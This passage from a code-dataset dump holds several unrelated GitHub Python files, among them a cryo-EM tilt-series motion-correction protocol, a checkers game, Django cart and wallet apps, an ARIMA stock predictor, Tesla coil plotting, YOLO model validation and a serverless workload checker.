pw.utils.cleanPath(alignedFrameStack)\n\n tiFn, tiFnDW = self._getOutputTiltImagePaths(tiltImageM)\n if not os.path.exists(tiFn):\n raise Exception(\"Expected output file '%s' not produced!\" % tiFn)\n\n if not pw.utils.envVarOn('SCIPION_DEBUG_NOCLEAN'):\n pw.utils.cleanPath(workingFolder)\n\n def createDWTs(self, ts):\n \"\"\" Dose weighting creation\"\"\"\n\n if self._createOutputWeightedTS():\n if self.TiltSeriesDW is None:\n self.TiltSeriesDW = self._createOutputSet(suffix='_dose-weighted')\n self.TiltSeriesDW.setSamplingRate(self._getOutputSampling())\n else:\n self.TiltSeriesDW.enableAppend()\n\n tsObjDW = TiltSeries()\n tsObjDW.copyInfo(ts, copyId=True)\n self.TiltSeriesDW.append(tsObjDW)\n\n tsFnDW = self._getDWTiltSeriesPath(ts)\n\n for i, ti in enumerate(ts):\n tiOut = TiltImage(location=(i+1, tsFnDW))\n tiOut.copyInfo(ti, copyId=True)\n tiOut.setAcquisition(ti.getAcquisition())\n tiOut.setSamplingRate(self._getOutputSampling())\n tiOut.setObjId(ti.getIndex())\n tsObjDW.append(tiOut)\n\n self.TiltSeriesDW.update(tsObjDW)\n\n def createOddEvenTs(self, ts, odd=True):\n def addTiltImage(tiLocation, tsObject, mainti, tsIde, samplingRate):\n \"\"\"\n :param tiLocation: Location of the aligned tilt image in the stack\n :param tsObject: Tilt Series to which the new Ti Image will be added\n :param mainti: Tilt Series Movies object\n :param tsIde: Tilt series identifier\n :param samplingRate: current Tilt Series sampling rate\n \"\"\"\n ta = mainti.getTiltAngle()\n to = mainti.getAcquisitionOrder()\n acq = mainti.getAcquisition()\n ti = TiltImage(tiltAngle=ta, tsId=tsIde, acquisitionOrder=to)\n ti.setSamplingRate(samplingRate)\n ti.setAcquisition(acq)\n index, fname = tiLocation.split(\"@\")\n ti.setLocation(int(index), fname)\n tsObject.append(ti)\n pw.utils.cleanPath(tiLocation)\n\n if odd:\n suffix = ODD\n outputAttr = OUTPUT_TILT_SERIES_ODD\n oddEvenIndex = 0\n else:\n suffix = EVEN\n outputAttr = OUTPUT_TILT_SERIES_EVEN\n oddEvenIndex = 1\n\n template = 'tiltseries%s.sqlite'\n sRate = self._getOutputSampling()\n\n output = getattr(self, outputAttr, None)\n if output:\n output.enableAppend()\n else:\n output = SetOfTiltSeries.create(self._getPath(), template=template, suffix=suffix)\n setattr(self, outputAttr, output)\n output.setSamplingRate(sRate)\n\n tsObj = TiltSeries()\n tsObj.copyInfo(ts, copyId=True)\n output.append(tsObj)\n\n tsId = ts.getTsId()\n for ti in ts:\n fnImg = ti.getOddEven()[oddEvenIndex]\n addTiltImage(fnImg, tsObj, ti, tsId, sRate)\n\n # update items and size info\n output.update(tsObj)\n\n def processTiltSeriesStep(self, tsId):\n \"\"\" Create a single stack with the tiltseries. \"\"\"\n def createStack(tiList, tsFn, fngetter, locationSetter=None):\n \"\"\" This function creates a stack from individual images \"\"\"\n for i, ti in enumerate(tiList):\n tiFn = fngetter(ti)\n #newLocation = (i + 1, tsFn)\n #ih.convert(tiFn, newLocation)\n #pw.utils.cleanPath(tiFn)\n if os.path.exists(tiFn):\n newLocation = (i + 1, tsFn)\n ih.convert(tiFn, newLocation)\n pw.utils.cleanPath(tiFn)\n if locationSetter:\n locationSetter(newLocation, ti)\n\n ts = self._tsDict.getTs(tsId)\n ts.setDim([])\n\n tiList = self._tsDict.getTiList(tsId)\n tiList.sort(key=lambda ti: ti.getTiltAngle())\n\n ih = ImageHandler()\n\n tsFn = self._getOutputTiltSeriesPath(ts)\n\n # Merge all micrographs from the same tilt images in a single \"mrcs\" stack file\n createStack(tiList, tsFn, self._getOutputTiltImagePath, locationSetter=lambda newloc, ti: ti.setLocation(newloc))\n\n # Dose weighted\n if self._createOutputWeightedTS():\n\n createStack(tiList, self._getDWTiltSeriesPath(ts), self._getOutputTiltImageDWPath)\n\n if self._doSplitEvenOdd():\n tsFnOdd = self._getOutputTiltSeriesPath(ts, '_odd')\n tsFnEven = self._getOutputTiltSeriesPath(ts, '_even')\n createStack(tiList, tsFnOdd, self._getOutputTiltImageOddPath,\n locationSetter=lambda newloc, ti: ti.setOdd(ih.locationToXmipp(newloc)))\n createStack(tiList, tsFnEven, self._getOutputTiltImageEvenPath,\n locationSetter=lambda newloc, ti: ti.setEven(ih.locationToXmipp(newloc)))\n\n self._tsDict.setFinished(tsId)\n\n def _getDWTiltSeriesPath(self, ts:TiltSeries):\n\n return self._getOutputTiltSeriesPath(ts, '_DW')\n\n def _updateOutput(self, tsIdList):\n \"\"\" Update the output set with the finished Tilt-series.\n Params:\n :param tsIdList: list of ids of finished tasks.\n \"\"\"\n\n def writeAndStore(obj):\n obj.write()\n self._store(obj)\n\n # Flag to check the first time we save output\n self._createOutput = getattr(self, '_createOutput', True)\n\n outputSet = self._getOutputSet()\n\n if outputSet is None:\n # Special case just to update the outputSet status\n # but it only makes sense when there is outputSet\n if not tsIdList:\n return\n outputSet = self._createOutputSet()\n else:\n outputSet.enableAppend()\n self._createOutput = False\n\n # Call the sub-class method to update the output\n outputSet.setSamplingRate(self._getOutputSampling())\n self._updateOutputSet(outputSet, tsIdList)\n outputSet.setStreamState(Set.STREAM_OPEN)\n\n if self._doSplitEvenOdd():\n self.TiltSeriesEven.setStreamState(Set.STREAM_OPEN)\n self.TiltSeriesOdd.setStreamState(Set.STREAM_OPEN)\n\n if self._createOutputWeightedTS():\n self.TiltSeriesDW.setStreamState(Set.STREAM_OPEN)\n\n if self._createOutput:\n outputSet.updateDim()\n outputs = {self._getOutputName(): outputSet}\n if self._createOutputWeightedTS():\n self.TiltSeriesDW.updateDim()\n outputs.update({OUTPUT_TILT_SERIES_DW: self.TiltSeriesDW})\n\n if self._doSplitEvenOdd():\n self.TiltSeriesEven.updateDim()\n self.TiltSeriesOdd.updateDim()\n outputs.update({OUTPUT_TILT_SERIES_EVEN: self.TiltSeriesEven,\n OUTPUT_TILT_SERIES_ODD: self.TiltSeriesOdd\n })\n self._defineOutputs(**outputs)\n self._defineSourceRelation(self._getInputTsPointer(), self.TiltSeriesEven)\n self._defineSourceRelation(self._getInputTsPointer(), self.TiltSeriesOdd)\n else:\n self._defineOutputs(**outputs)\n\n if self._createOutputWeightedTS():\n self._defineSourceRelation(self._getInputTsPointer(), self.TiltSeriesDW)\n\n self._defineSourceRelation(self._getInputTsPointer(), outputSet)\n self._createOutput = False\n else:\n writeAndStore(outputSet)\n if self._doSplitEvenOdd():\n writeAndStore(self.TiltSeriesEven)\n writeAndStore(self.TiltSeriesOdd)\n if self._createOutputWeightedTS():\n writeAndStore(self.TiltSeriesDW)\n\n outputSet.close()\n if self._doSplitEvenOdd():\n self.TiltSeriesEven.close()\n self.TiltSeriesOdd.close()\n\n if self._createOutputWeightedTS():\n self.TiltSeriesDW.close()\n\n if self._tsDict.allDone():\n self._coStep.setStatus(params.STATUS_NEW)\n\n def _updateOutputSet(self, outputSet, tsIdList):\n \"\"\" Override this method to convert the TiltSeriesM into TiltSeries.\n \"\"\"\n for tsId in tsIdList:\n ts = TiltSeries()\n ts.copyInfo(self._tsDict.getTs(tsId), copyId=True)\n ts.setSamplingRate(self._getOutputSampling())\n outputSet.append(ts)\n tList = self._tsDict.getTiList(tsId)\n ind = np.argsort([ti.getTiltAngle() for ti in tList])\n counter = 1\n\n for i in ind: # Make each row of the sqlite file be sorted by\n # index after having been sorted by angle previously, in order to avoid tilt image mismatching in\n # another operations, such as the fiducial alignment, which expects the sqlite to be sorted that way\n ti = tList[i]\n tiOut = TiltImage(location=(counter, ti.getFileName()))\n tiOut.copyInfo(ti, copyId=True)\n tiOut.setAcquisition(ti.getAcquisition())\n tiOut.setSamplingRate(self._getOutputSampling())\n tiOut.setObjId(ti.getIndex())\n ts.append(tiOut)\n counter += 1\n\n outputSet.update(ts)\n\n # Create dose weighted set\n self.createDWTs(ts)\n\n # Even and odd stuff\n if self._doSplitEvenOdd():\n self.createOddEvenTs(ts, True)\n self.createOddEvenTs(ts, False)\n\n # --------------------------- INFO functions ------------------------------\n def _validate(self):\n errors = []\n return errors\n\n def _summary(self):\n return [self.summaryVar.get('')]\n\n # --------------------------- UTILS functions ----------------------------\n def _initialize(self):\n inputTs = self._getInputTs()\n acq = inputTs.getAcquisition()\n gain, dark = self.getGainAndDark()\n self.__basicArgs = [\n acq.getDoseInitial(), acq.getDosePerFrame(), gain, dark]\n\n def _getArgs(self):\n return self.__basicArgs\n\n def _getInputTsPointer(self):\n return self.inputTiltSeriesM\n\n def _getOutputSampling(self):\n return self.inputTiltSeriesM.get().getSamplingRate() * self._getBinFactor()\n\n def _processTiltImageM(self, workingFolder, tiltImageM, *args):\n \"\"\" This function should be implemented in subclasses to really provide\n the processing step for this TiltSeries Movie.\n Output corrected image (and DW one) should be copied to expected name.\n \"\"\"\n pass\n\n def getGainAndDark(self):\n \"\"\" Return temporary paths of gain and dark if relevant. \"\"\"\n inputTs = self.inputTiltSeriesM.get()\n gain = os.path.abspath(self._getTmpPath('gain.mrc')) if inputTs.getGain() else None\n dark = os.path.abspath(self._getTmpPath('dark.mrc')) if inputTs.getDark() else None\n return gain, dark\n\n def _getFrameRange(self, n, prefix):\n \"\"\"\n Params:\n :param n: Number of frames of the movies\n :param prefix: what range we want to consider, either 'align' or 'sum'\n :return: (i, f) initial and last frame range\n \"\"\"\n # In case that the user select the same range for ALIGN and SUM\n # we also use the 'align' prefix\n if self._useAlignToSum():\n prefix = 'align'\n\n first = self.getAttributeValue('%sFrame0' % prefix)\n last = self.getAttributeValue('%sFrameN' % prefix)\n\n if first <= 1:\n first = 1\n\n if last <= 0:\n last = n\n\n return first, last\n\n def _getBinFactor(self):\n return self.getAttributeValue('binFactor', 1.0)\n\n # ----- Some internal functions ---------\n def _getTiltImageMRoot(self, tim):\n return '%s_%02d' % (tim.getTsId(), tim.getObjId())\n\n def __getTiltImageMWorkingFolder(self, tiltImageM):\n return self._getTmpPath(self._getTiltImageMRoot(tiltImageM))\n\n def _getOutputTiltImagePaths(self, tiltImageM):\n \"\"\" Return expected output path for correct movie and DW one.\n \"\"\"\n return self._getOutputTiltImagePath(tiltImageM), self._getOutputTiltImageDWPath(tiltImageM)\n\n def _getOutputTiltImagePath(self, tiltImageM):\n \"\"\" Return the main path for the tilt image corrected movie.\n \"\"\"\n return self._getExtraPath(self._getTiltImageMRoot(tiltImageM)) + '.mrc'\n\n def _getOutputTiltImageDWPath(self, tiltImageM):\n \"\"\" Return the main path for the tilt image dose weighted corrected movie.\n \"\"\"\n return self._getExtraPath(self._getTiltImageMRoot(tiltImageM)) + '_DW.mrc'\n\n def _getOutputTiltImageOddPath(self, tiltImageM):\n \"\"\" Return the path for the odd tilt image corrected movie.\n \"\"\"\n return tiltImageM.getOdd()\n\n def _getOutputTiltImageEvenPath(self, tiltImageM):\n \"\"\" Return the path for the even tilt image corrected movie.\n \"\"\"\n return tiltImageM.getEven()\n\n def _getOutputTiltSeriesPath(self, ts, suffix=''):\n return self._getExtraPath('%s%s.mrcs' % (ts.getTsId(), suffix))\n\n def _useAlignToSum(self):\n return True\n\n def _createOutputWeightedTS(self):\n return False\n\n\nclass ProtTsAverage(ProtTsCorrectMotion):\n \"\"\"\n Simple protocol to average TiltSeries movies as basic\n motion correction. It is used mainly for testing purposes.\n \"\"\"\n _label = 'average tilt-series movies'\n _devStatus = pw.BETA\n\n def _processTiltImageM(self, workingFolder, tiltImageM, *args):\n \"\"\" Simple add all frames and divide by its number. \"\"\"\n ih = ImageHandler()\n sumImg = ih.createImage()\n img = ih.createImage()\n\n n = tiltImageM.getNumberOfFrames()\n fn = tiltImageM.getFileName()\n\n sumImg.read((1, fn))\n\n for frame in range(2, n + 1):\n img.read((frame, fn))\n sumImg.inplaceAdd(img)\n\n # sumImg.inplaceDivide(float(n))\n outputFn = self._getOutputTiltImagePaths(tiltImageM)[0]\n sumImg.write(outputFn)\n","repo_name":"scipion-em/scipion-em-tomo","sub_path":"tomo/protocols/protocol_ts_correct_motion.py","file_name":"protocol_ts_correct_motion.py","file_ext":"py","file_size_in_byte":22035,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"29938896509","text":"import pygame\r\nfrom man.play import Game \r\nclass human:\r\n\r\n def get_position_input(self,pos,SQUARE_SIZE):\r\n self.x, self.y = pos\r\n self.row = self.y // SQUARE_SIZE\r\n self.col = self.x // SQUARE_SIZE\r\n return self.row, self.col\r\n\r\n def start(self):\r\n self.WIDTH, self.HEIGHT = 600, 600\r\n self.WIN = pygame.display.set_mode((self.WIDTH, self.HEIGHT))\r\n pygame.display.set_caption('Checkers')\r\n self.ROWS, self.COLS = 8, 8\r\n self.SQUARE_SIZE = self.WIDTH//self.COLS\r\n self.Orange=(255, 128, 0)\r\n self.FPS = 60\r\n run = True\r\n clock = pygame.time.Clock()\r\n game = Game(self.WIN)\r\n\r\n while run:\r\n clock.tick(self.FPS)\r\n\r\n if game.winner() != None:\r\n print(game.winner())\r\n run = False\r\n pygame.quit()\r\n for self.event in pygame.event.get():\r\n if self.event.type == pygame.QUIT:\r\n self.run = False\r\n pygame.quit()\r\n if self.event.type == pygame.MOUSEBUTTONDOWN:\r\n self.pos = pygame.mouse.get_pos()\r\n self.row, self.col = self.get_position_input(self.pos,self.SQUARE_SIZE)\r\n game.select(self.row, self.col)\r\n\r\n game.update()\r\n \r\n \r\n\r\n","repo_name":"Nkit-333/Checkers_game-GUI-Aritificial-intelligence-","sub_path":"man/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"11973021347","text":"from django.urls.conf import path\nfrom .import views\nfrom os import name\n\n\nurlpatterns = [\n path('cart_view',views.cart_view,name = 'cart_view'),\n path('add_cart',views.add_cart, name='add_cart'),\n path('cartitem_dlt',views.cartitem_dlt, name='cartitem_dlt'),\n path('product_increment',views.product_increment, name='product_increment'),\n path('product_decrement',views.product_decrement, name='product_decrement'),\n path('checkout/',views.checkout, name='checkout')\n]\n","repo_name":"mejokkurian/ecommerce-website","sub_path":"cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71432424109","text":"#coding: utf-8\n\ndef load_from_pickle(): #загрузка объекта из файла\n import pickle\n \n try:\n with open ('data.pickle','rb') as f:\n data = pickle.load(f)\n is_empty = False\n except Exception as e: #если объекта ещё нет\n print(type(e))\n print('Database is empty!')\n data = []\n is_empty = True\n else:\n print('Data base is not empty! ')\n finally:\n f.close()\n return data,is_empty\n\ndef save_to_pickle(data): #сохранение в pickle\n import pickle\n\n with open ('data.pickle','wb') as f:\n pickle.dump(data,f) #запись объекта в файл\n\n f.close()\n","repo_name":"asokolkova/itmo_python","sub_path":"dz_5/cars/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"712587199","text":"from django import forms\nfrom .models import Proyecto,Alumno\nfrom superusuario.forms import UserForm\n\n\nclass MyProyectoForm(forms.ModelForm):\n class Meta:\n model = Proyecto\n fields = ('nombre', 'descripcion')\n widgets = {\n 'nombre': forms.TextInput(attrs={'class': 'form-control', 'require': 'require'}),\n 'descripcion': forms.Textarea(attrs={'class': 'form-control', 'require': 'require'}),\n }\n\nclass AlumnoSelfForm(forms.ModelForm):\n NoControl = forms.CharField(label='Matricula')\n class Meta(UserForm.Meta):\n fields = '__all__'","repo_name":"AlexSB664/ResideTec","sub_path":"alumno/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"3914808929","text":"import numpy as np\nimport pandas as pd\nimport pathlib\n\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom pandas import DataFrame\nfrom sklearn.metrics import mean_squared_error\n\ndef predict(symbol):\n # Read Stock Data\n current_path = pathlib.Path(__file__).parent.resolve()\n stock_csv_path = current_path.joinpath(\n '../datasets/{}.csv'\n .format(symbol.decode(\"utf-8\"))\n # .replace(\"b'\", \"\")\n # .replace(\"'\", \"\")\n )\n\n stock_data = pd.read_csv(stock_csv_path)\n\n # Grab Date & Close\n training_data = stock_data.iloc[-400:-60, [0, 4]]\n validation_data = stock_data.iloc[-60:, [0, 4]]\n\n # Split Test & Training\n training_items = training_data[\"Close\"].values\n testing_items = validation_data[\"Close\"].values\n\n # Build Model\n history = [x for x in training_items]\n model_predictions = []\n N_test_observations = len(testing_items)\n\n # Rolling Forecast\n for time_point in range(N_test_observations):\n model = ARIMA(history, order=(4,1,0))\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output[0]\n model_predictions.append(yhat)\n true_test_value = testing_items[time_point]\n history.append(true_test_value)\n\n MSE_error = mean_squared_error(testing_items, model_predictions)\n print('Testing Mean Squared Error is {}'.format(MSE_error))\n\n model = ARIMA(history, order=(4,1,0))\n model_fit = model.fit()\n result = model_fit.forecast()[0]\n\n return str(result)\n","repo_name":"MikaAK/trading-tools","sub_path":"ai_predictor/priv/python/arima_model.py","file_name":"arima_model.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"3825447129","text":"# Import Python libraries\nimport pandas as pd\nimport numpy as np\nimport plotly\n\n# Display graph in offline mode\nplotly.offline.init_notebook_mode(connected=False)\n\n# Import experimemnt data spreadsheet as .csv file\nCoilData = pd.read_csv('C:/Users/K8nn8/Google Drive/School/Fall 2017/Physics 2 Electromagnetism/TeslaCoilDataCSV.csv')\n\n# Create lists of radius values for all three topload configurations\nr_Torus = (CoilData['Torus 20V (cm)'], CoilData['Torus 25V (cm)'], CoilData['Torus 30V (cm)'])\nr_Sphere = (CoilData['Sphere 20V (cm)'], CoilData['Sphere 25V (cm)'], CoilData['Sphere 30V (cm)'])\nr_None = (CoilData['None 20V (cm)'], CoilData['None 25V (cm)'], CoilData['None 30V (cm)'])\n\n# Group radius values into list 'r'\nr = [r_Torus, r_Sphere, r_None]\n\n# Define 'theta' as a fuction that rotates findings at intervals of pi/8\ntheta = np.linspace(0, 2*np.pi, 16)\n\n# List trace names under their topload categories\ntrace_Torus = ['trace_T20', 'trace_T25', 'trace_T30']\ntrace_Sphere = ['trace_S20', 'trace_S25', 'trace_S30']\ntrace_None = ['trace_N20', 'trace_N25', 'trace_N30']\n\n# Group trace names into list\ntrace_name = [trace_Torus, trace_Sphere, trace_None]\n\n# Lists of various values related to each topload type; indexed for looping\ntrace_label = ['20 Volts', '25 Volts', '30 Volts']\ntrace_color = ['blue', 'red', 'green']\ndata = ['data_Torus', 'data_Sphere', 'data_None']\ntitle = ['Tesla Coil with Torus Topload', 'Tesla Coil with Spherical Topload', 'Tesla Coil with No Topload']\nlayout = ['layout_Torus', 'layout_Sphere', 'layout_None']\nfig = ['fig_Torus', 'fig_Sphere', 'fig_None']\ngraph = ['Torus', 'Sphere', 'None']\nfilename = ['Tesla_3dScatter_Torus', 'Tesla_3dScatter_Sphere', 'Tesla_3dScatter_None']\n\n# Loop through each topload configuration\nk = 0\nfor k in range(3):\n\n # Loop through each voltage setting for each topload config\n i = 0\n for i in range(3):\n x, y, z = (r[k][i]*np.cos(theta[0]), r[k][i]*np.sin(theta[0]), CoilData['Height (cm)'])\n\n # Loop through each theta value at each voltage setting for each topload config\n j = 1\n for j in range(len(theta)):\n x = x.append(r[k][i]*np.cos(theta[j]), ignore_index=True)\n y = y.append(r[k][i]*np.sin(theta[j]), ignore_index=True)\n z = z.append(CoilData['Height (cm)'], ignore_index=True)\n j = j + 1\n\n trace_name[k][i] = plotly.graph_objs.Scatter3d(\n x=x,\n y=y,\n z=z,\n mode='markers',\n name=trace_label[i],\n marker=dict(\n size=6,\n line=dict(\n color=trace_color[i],\n width=0.5\n ),\n opacity=0.7\n )\n )\n i = i + 1\n\n data[k] = trace_name[k]\n layout[k] = plotly.graph_objs.Layout(\n title=\"\",\n margin=dict(\n l=0,\n r=0,\n b=0,\n t=0\n )\n )\n\n fig[k] = plotly.graph_objs.Figure(data=data[k], layout=layout[k])\n graph[k] = plotly.offline.plot(fig[k], filename=filename[k])\n k = k + 1\n","repo_name":"CoryK8nn8dy/TeslaCoil","sub_path":"TeslaCoilScatterPlots.py","file_name":"TeslaCoilScatterPlots.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"15767777609","text":"from model_handler import ModelHandler\nimport argparse\nimport sys\nimport os\n\ndef validate_model(model_path, data_path):\n # Get the model name from the path\n model_name = os.path.basename(os.path.dirname(os.path.dirname(model_path)))\n\n model_handler = ModelHandler(data_path=None, model_path=model_path)\n metrics = model_handler.val(TEST_DATA_PATH=data_path)\n\n # Create output directory path using metrics.save_dir\n output_dir = os.path.join(metrics.save_dir)\n\n # Make sure the directory exists\n os.makedirs(output_dir, exist_ok=True)\n\n # Redirect stdout to a file\n old_stdout = sys.stdout\n sys.stdout = open(os.path.join(output_dir, f'{model_name}_output.txt'), 'w')\n\n print(metrics)\n print(metrics.box)\n\n # Restore original stdout\n sys.stdout = old_stdout\n\n print(f'Metrics and box have been printed to {model_name}_output.txt in the directory: {output_dir}')\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('MODEL_100', type=str, help=\"Path to the first model weights\")\n parser.add_argument('MODEL_ALL', type=str, help=\"Path to the second model weights\")\n parser.add_argument('TEST_DATA', type=str, help=\"Path to the test data\")\n args = parser.parse_args()\n\n validate_model(args.MODEL_100, args.TEST_DATA)\n validate_model(args.MODEL_ALL, args.TEST_DATA)\n\n\n\n# 1. seg model poly 100 and poly all\n# python test_model_100_ALL.py runs\\segment\\seg-poly-initial\\weights\\best.pt runs\\segment\\seg_poly_AL2\\weights\\best.pt datasets\\2_tomato-test\\data.yaml\n\n# 2. seg model bb 100 and bb all\n# python test_model_100_ALL.py runs\\segment\\seg-bb-100\\weights\\best.pt runs\\segment\\seg-bb-all\\weights\\best.pt datasets\\tomato-obb\\data.yaml\n\n# 3. det model poly 100 and poly all\n# python test_model_100_ALL.py runs\\detect\\det-poly-initial\\weights\\best.pt runs\\detect\\det-poly-AL2\\weights\\best.pt datasets\\2_tomato-test\\data.yaml\n\n# 4. det model bb 100 and bb all\n# python test_model_100_ALL.py runs\\detect\\det-bb-100\\weights\\best.pt runs\\detect\\det-bb-all\\weights\\best.pt datasets\\tomato-obb\\data.yaml\n\n\n","repo_name":"jinyoonok2/YOLOv8-ADL","sub_path":"PV_project_prototype/test_model_100_ALL.py","file_name":"test_model_100_ALL.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24185064516","text":"import logging\nimport sys\n\n# Local imports\nsys.path = [\"./\", \"../\"] + sys.path\nfrom GenConfigs import *\n\nsys.path = [FAAS_ROOT + \"/synthetic_workload_invoker\"] + sys.path\nfrom commons.Logger import ScriptLogger\n\nlogger_wlch = ScriptLogger(\"workload_checker\", \"SWI.log\")\n\nsupported_distributions = {\"Poisson\", \"Uniform\"}\n\n\ndef CheckWorkloadValidity(workload):\n \"\"\"\n Checks whether a loaded workload is valid.\n \"\"\"\n logger_wlch.info(\"Started CheckWorkloadValidity\")\n # 1 - Check if the workload has been successfully read in ReadJSONConfig\n if workload is None:\n logger_wlch.info(\"Workload not valid => Terminating\")\n return False\n # 2 - Check for validity of general field\n print(workload)\n fields_to_check = [[\"test_name\", str], [\"blocking_cli\", bool]]\n for field in fields_to_check:\n try:\n print([field, workload[field[0]]])\n if type(workload[field[0]]) is not field[1]:\n test_name(\n \"Input of the \" + field[0] + \" field should be a \" + str(field[1])\n )\n return False\n except:\n logger_wlch.error(\"No \" + field[0] + \" field provided!\")\n return False\n # # 3 - Check if invocation scripts exists for all functions/applications in the workload\n application_set = set()\n distribution_set = set()\n for (instance, specs) in workload[\"instances\"].items():\n application_set.add(specs[\"application\"])\n try:\n distribution_set.add(specs[\"distribution\"])\n except:\n pass\n\n logger_wlch.info(\"Required applications: \" + str(application_set))\n # 4 - Check for supported distributions\n if not distribution_set.issubset(supported_distributions):\n logger_wlch.error(\n \"At least one specified distribution is not supported. Supported distribution(s): \"\n + str(supported_distributions)\n )\n return False\n # 5 - Check for valid test duration\n try:\n test_duration_in_seconds = workload[\"test_duration_in_seconds\"]\n if test_duration_in_seconds is None:\n logger_wlch.error(\n \"Please enter a valid value for test_duration_in_seconds field in the config file.\"\n )\n return False\n elif int(test_duration_in_seconds) <= 0:\n logger_wlch.error(\"test_duration_in_seconds should be greater than zero!\")\n return False\n except:\n logger_wlch.error(\n \"test_duration_in_seconds field not specified in the json config file\"\n )\n return False\n # 6 - Check that the random_seed field is entered\n try:\n random_seed = workload[\"random_seed\"]\n except:\n logger_wlch.error(\"No random_seed field specified in the config file\")\n return False\n\n return True\n","repo_name":"PrincetonUniversity/faas-profiler","sub_path":"synthetic_workload_invoker/WorkloadChecker.py","file_name":"WorkloadChecker.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"37"}
+{"seq_id":"74650732267","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\nfrom django.views import generic\nfrom utils.at_exceptions import BalanceError, CurrencyError\nimport shutil\n# Create your views here.\n\nfrom .models import Wallet, Balance, Operation, Currency\nfrom .graphs import operations_graph_per_balance\n\ndef get_extra_content(active_id):\n pages = ['wallets', 'balance']\n Pages = []\n for i,p in enumerate(pages):\n Pages.append({'active': i + 1 == active_id,\n 'id': i + 1, \n 'link':'portofolio:' + p,\n 'title': p[0].upper() + p[1:]\n })\n return {'pages_list':Pages, 'app':'portofolio'}\n\ndef index(request):\n Wallets = Wallet.objects.all()\n context = {'Wallets': Wallets, 'app': 'wallet'}\n return render(request, 'wallet/index.html', context)\n \ndef detail(request, wallet_id, message=''):\n ActiveWallet = Wallet.objects.get(pk=wallet_id)\n B = Balance.objects.filter(wallet = ActiveWallet)\n C = Currency.objects.all()\n balances = [{'id': bal.id, \n 'currency': bal.currency,\n 'amount': bal.amount,\n 'amount_str': '{:0.2f}'.format(bal.amount),\n 'converted': '{:0.2f}'.format(bal.converted_balance()) } for bal in B]\n total = '{:0.2f}'.format(sum([bal.converted_balance() for bal in B]) * ActiveWallet.baseCurrency.rate)\n context = {'owner': ActiveWallet.owner,\n 'wallet': ActiveWallet,\n 'balances': balances,\n 'total': total,\n 'currency': C,\n 'message': message, \n 'app': 'wallet'\n }\n return render(request, 'wallet/detail.html', context)\n\ndef balance_detail(request, balance_id):\n balance = Balance.objects.get(pk = balance_id)\n ActiveWallet = Wallet.objects.get(id=balance.wallet.id)\n operations = Operation.objects.filter(balance = balance)\n O = Operation()\n graph = operations_graph_per_balance(balance.pk)\n context = {'owner': balance.wallet.owner,'balance': balance, 'operations': operations, 'app': 'wallet','wallet': ActiveWallet, 'graph': graph}\n return render(request, 'wallet/balance_detail.html', context)\n\ndef add_valuta(request, wallet_id):\n wallet = get_object_or_404(Wallet, pk=wallet_id)\n try:\n amount = float(request.POST['amount'])\n except ValueError:\n return detail(request,wallet_id,'You must enter an amount')\n else:\n currency_abb = request.POST['currency']\n if request.POST['operation'] == 'deposit':\n wallet.addToBalance(amount, currency_abb)\n else:\n try:\n wallet.subtractFromBalance(amount, currency_abb)\n except (CurrencyError, BalanceError):\n errmsg = shutil.sys.exc_info()[1].args[0]\n return detail(request,wallet_id, errmsg)\n except:\n return detail(request,wallet_id,shutil.sys.exc_info())\n \n return HttpResponseRedirect(reverse('wallet:detail', args=(wallet_id,)))","repo_name":"oneindelijk/autotrader","sub_path":"pyTrade/wallet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"9778788511","text":"# https://www.youtube.com/watch?v=dnrJ4zwCADM&list=RDCMUC87aeHqMrlR6ED0w2SVi5nw&index=29\n# not sure how good this realy is...\nimport pandas as pd\nimport yfinance as yf\nimport pandas_datareader.data as reader\nimport datetime as dt\nfrom dateutil.relativedelta import relativedelta\n\n# Get ticker symbols fro the stocks contained in DJI\ntable = pd.read_html(\"https://en.wikipedia.org/wiki/Dow_Jones_Industrial_Average\")[0] # multiple tables retrieved\ntickers = table.Symbol.tolist()\n\n# Get prices for the DJI components\nstart = dt.datetime(2018,1,31)\nend = dt.datetime(2020, 1, 31)\n\ndf = reader.get_data_yahoo(tickers, start, end)['Adj Close']\n\n# Calculate monthly returns by cumulating daily returns\nmtl_ret = df.pct_change().resample('M').agg(lambda x:(x+1).prod() -1)\nprint(mtl_ret)\n\n# Calculate returns over the past 11 months\nimport numpy as np\n\n# Getting past 11 month cumulated returns\npast_11 = (mtl_ret+1).rolling(11).apply(np.prod)-1 # 11 months\nprint(past_11)\n\n# Set Portfolio formation date\nformation = dt.datetime(2019,12,31)\nend_measurement = formation - relativedelta(months=1)\nprint(formation, end_measurement)\n\n# Get past 12 months skippping the most recent one. \nret_12 = past_11.loc[end_measurement]\nprint(ret_12) # past 12 month performance\n\n# transform to df to manipulate\nret_12 = ret_12.reset_index()\nprint(ret_12)\n\nret_12['quintile'] = pd.qcut(ret_12.iloc[:,1],5, labels=False)\nprint(ret_12)\n\nwinner = ret_12[ret_12.quintile 